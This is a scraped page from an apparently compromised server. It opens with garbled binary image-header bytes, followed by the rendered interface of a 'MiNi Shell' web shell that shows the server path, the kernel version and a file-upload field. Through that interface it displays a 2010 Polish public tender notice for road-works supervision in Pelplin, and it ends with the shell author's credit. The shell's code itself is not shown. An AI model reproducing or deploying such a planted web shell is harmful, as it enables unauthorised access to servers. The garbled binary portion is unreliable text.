JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100401/75079-N-2010.html

<p class="kh_header"><b>Pelplin: Pełnienie nadzoru inwestorskiego na zadaniu inwestycyjnym p.n. Przebudowa drogi powiatowej - ul. Kościuszki w Pelplinie (2886G) - etap II</b><br>
<b>Numer ogłoszenia: 75079 - 2010; data zamieszczenia: 01.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pelplin , plac Grunwaldzki 4, 83-130 Pelplin, woj. pomorskie, tel. 58 536 12 61, faks 536 14 64.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego na zadaniu inwestycyjnym p.n. Przebudowa drogi powiatowej - ul. Kościuszki w Pelplinie (2886G) - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia stanowi usługę pełnienia nadzoru inwestorskiego dla zadania inwestycyjnego p.n.Przebudowa drogi powiatowej - ul. Kościuszki w Pelplinie(2886G) - etap II (długość 936,20 m).
Szczegółowy zakres robót budowlanych zawarty jest w dokumentacji projektowej (załączono do postępowania na roboty budowlane pn. Przebudowa drogi powiatowej - ul. Kościuszki w Pelplinie dział przetargi na stronie www.pelplin.pl)
W ramach niniejszego zamówienia Nadzór Inwestorski zobowiązuje się w szczególności do:
1) Reprezentowania Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, w tym również projektami budowlanymi, projektami budowlanymi wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót (zwanych również specyfikacjami technicznymi), pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej.
2) Sprawdzania zgodności robót z dokumentacją projektową, specyfikacjami technicznymi, przepisami techniczno-wykonawczymi, normami i przepisami BHP.
3) Współpracy z projektantem, w tym do egzekwowania usunięcia ewentualnych usterek w dokumentacji projektowej.
4) Bieżącej kontroli zgodności wykonywanych prac z harmonogramem rzeczowo-finansowym robót.
5) Podejmowania działań w celu dotrzymania terminu realizacji budowy.
6) Podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) materiałów, sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o przepisy, normy i wymagania sformułowane w umowie z wykonawcą robót, w dokumentacji projektowej i specyfikacjach technicznych.
7) Zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami umów i dokumentacją projektową, specyfikacjami technicznymi, dla wszystkich asortymentów robót, 
8) Sprawdzania jakości wykonywanych robót, wbudowanych wyrobów budowlanych, a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie, kontroli i archiwizacji dokumentów potwierdzających dopuszczenie tych materiałów do obrotu.
9) Sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia w próbach i odbiorach technicznych sieci i urządzeń technicznych.
10) Wydawania kierownikowi budowy lub kierownikom robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz           dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych.
11) Żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót.
12) Kontrolowania ilości i terminowości wykonywanych robót.
12)1) Kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót.
12)2) Uczestniczenia w dokonywaniu odbiorów częściowych inwestycji.
12)3) Wstrzymania dalszych robót budowlanych, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę.
12)4) Przygotowania zadania inwestycyjnego do odbioru końcowego - sprawdzenie i zatwierdzenie dokumentacji powykonawczej (operatu kolaudacyjnego), w tym powykonawczej dokumentacji geodezyjnej.
12)5) Sprawdzania faktur wykonawcy oraz dokumentów załączonych do rozliczenia robót.
12)6)Sporządzenia pełnego rozliczenia finansowego nadzorowanej inwestycji.
12)7)Dokonania odbioru inwestycji po upływie terminu gwarancji ustalonego w umowie z wykonawcą robót budowlanych.
13) Składania sprawozdań miesięcznych z postępu robót, obejmujących:
13)1) Szczegółowy wykaz robót wykonanych w okresie sprawozdawczym oraz narastająco od początku budowy (również z podaniem ich wartości kwotowej i procentowej).
13)2) Analizę zgodności postępu robót z harmonogramem rzeczowo-finansowym.
14) Niezależnie od składania sprawozdań Inspektor Nadzoru będzie informował na bieżąco Zamawiającego o przebiegu prac, o napotkanych problemach i pojętych działaniach zaradczych mających na celu ich przezwyciężenie (wczesne ostrzeganie zwłaszcza  w sprawach mogących wpłynąć na termin zakończenia robót).
15) Nadzorowania budowy w takich odstępach czasu, aby była zapewniona skuteczność nadzoru, jednak nie rzadziej niż 3 razy w tygodniu oraz na każde żądanie Zamawiającego - Inwestora w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora nadzoru będzie nieodzowna najpóźniej w następnym dniu od powiadomienia pisemnego lub ustnego. Każdorazowy pobyt na placu budowy winien być potwierdzony wpisem do dziennika budowy.
17) Wyznaczenia jednego z inspektorów jako koordynatora.
18) Współpraca z inspektorami nadzoru nad przebudową ulicy Kościuszki w Pelplinie - Etap I, w szczególności z ich koordynatorem - w zakresie prawidłowej realizacji nadzorowanej inwestycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 5.000,00 zł, słownie: pięć tysięcy zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnych innych wymogów, niż te które zawarte są w treści art. 22 ust.1 Prawa zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 niżej opisanej usługi:
a) rodzaj usługi:
- nadzór inwestorski nad budową, przebudową, remontem lub modernizacją drogi, w zakresie wszystkich elementów sieciowych z zakresu określonego przetargiem (kanalizacja sanitarna, kanalizacja deszczowa, wodociąg, oświetlenie, teletechnika, drogi),
b) wartość usługi:
- wartość usługi nadzoru inwestorskiego nie mniejsza niż 80 000,00 zł brutto, (słownie: osiemdziesiąt tysięcy złotych brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnych innych wymogów, niż te które zawarte są w treści art. 22 ust.1 Prawa zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zadania, a także zakresu wykonywania przez nich czynności, oraz  informacją o podstawie do dysponowania tymi osobami: a) 1 osoby na stanowisko Inspektora nadzoru branży drogowej posiadającej: 
- stosowne uprawnienia,dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót w specjalności,branży drogowej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 3 lata doświadczenia zawodowego w branży drogowej na stanowisku inspektora nadzoru lub kierownika budowy lub kierownika robót przy realizacji robot budowlanych drogowych;
b) 1 osoby na stanowisko Inspektora nadzoru w branży sanitarnej posiadającej:
- uprawnienia,dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót w specjalności,branży sanitarnej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 3 lata doświadczenia zawodowego w branży sanitarnej na stanowisku inspektora nadzoru lub kierownika budowy lub kierownika robót przy realizacji robot budowlanych drogowych;
c) 1 osoby na stanowisko Inspektora Nadzoru w branży elektrycznej/elektroenergetycznej posiadającej:
- uprawnienia,dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót w specjalności,branży elektrycznej/elektroenergetycznej, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 3 lata doświadczenia zawodowego w branży elektrycznej,elektroenergetycznej na stanowisku inspektora nadzoru lub kierownika budowy lub kierownika robót przy realizacji robot budowlanych drogowych;
d) 1 osoby na stanowisko Inspektora nadzoru w branży teletechnicznej  posiadającej:
- uprawnienia,dokumenty które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót w specjalności,branży teletechnicznej  w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 3 lata doświadczenia zawodowego w branży teletechnicznej na stanowisku inspektora nadzoru lub kierownika budowy lub kierownika robót przy realizacji robot budowlanych drogowych.

Przez wymagane doświadczenie zawodowe w danej branży na danym stanowisku (określonym w ppkt od a do d) należy rozumieć lata czynnie przepracowane na danym stanowisku przy realizacji robót budowlanych drogowych. Niniejsze oznacza, iż np. Osoba na stanowisko inspektora nadzoru branży teletechnicznej musi posiadać doświadczenie w tej branży na stanowisku inspektora nadzoru branży teletechnicznej lub kierownika robot branży teletechnicznej lub kierownika robot branży teletechnicznej przy realizacji robót budowlanych drogowych w ramach zamówienia,zamówień w łącznym w okresie co najmniej 3 lat. Wymagania dot. innych osób należy rozumieć analogicznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę  opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 100.000,00 zł (słownie: sto tysięcy zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony formularz oferty - wg Zał. Nr 1 SIWZ; 
b) Formularze cenowe wg zał. Nr 1A i 1B SIWZ; 
c) W sytuacji, gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków,  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,  w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia  (wg Zał. Nr 5B SIWZ).
d) dokument lub dokumenty potwierdzający/potwierdzające, że osoby podpisujące ofertę są uprawnione/umocowane do reprezentowania firmy, zgodnie z wymogami SIWZ; 
e) Dowód wniesienia wadium, zgodnie z wymogami SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pelplin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Pelplin, Plac Grunwaldzki 4, 83-130 Pelplin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2010 godzina 11:00, miejsce: Urząd Miasta i Gminy Pelplin, Plac Grunwaldzki 4 , 83-130 Pelplin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia obejmuje pełnienie nadzoru inwestorskiego na zadaniu inwestycyjnym p.n. Przebudowa drogi powiatowej - ul. Kościuszki w Pelplinie (2886G) - etap II, które będzie realizowane przez Powiat Tczewski i Gminę Pelplin. Zadanie obejmuje kompleksową przebudowę ulicy Kościuszki od kilometra 0+249,80 do granic miasta w km 1+186,00, w tym: zakres zadań realizowany przez Powiat Tczewski to zadania z zakresu branży drogowej, energetycznej wraz z oświetleniem, kanalizacji deszczowej. Zakres robót realizowany przez Gminę Pelplin to: kanalizacja sanitarna, wodociągowa, branża teletechniczna. Zakres zadania realizowany przez Powiat Tczewski realizowany będzie przy dofinansowaniu z Narodowego Programu Przebudowy Dróg Lokalnych. 
Zakres realizowany przez Gminę Pelplin będzie wspierany środkami z Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Gdańsku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com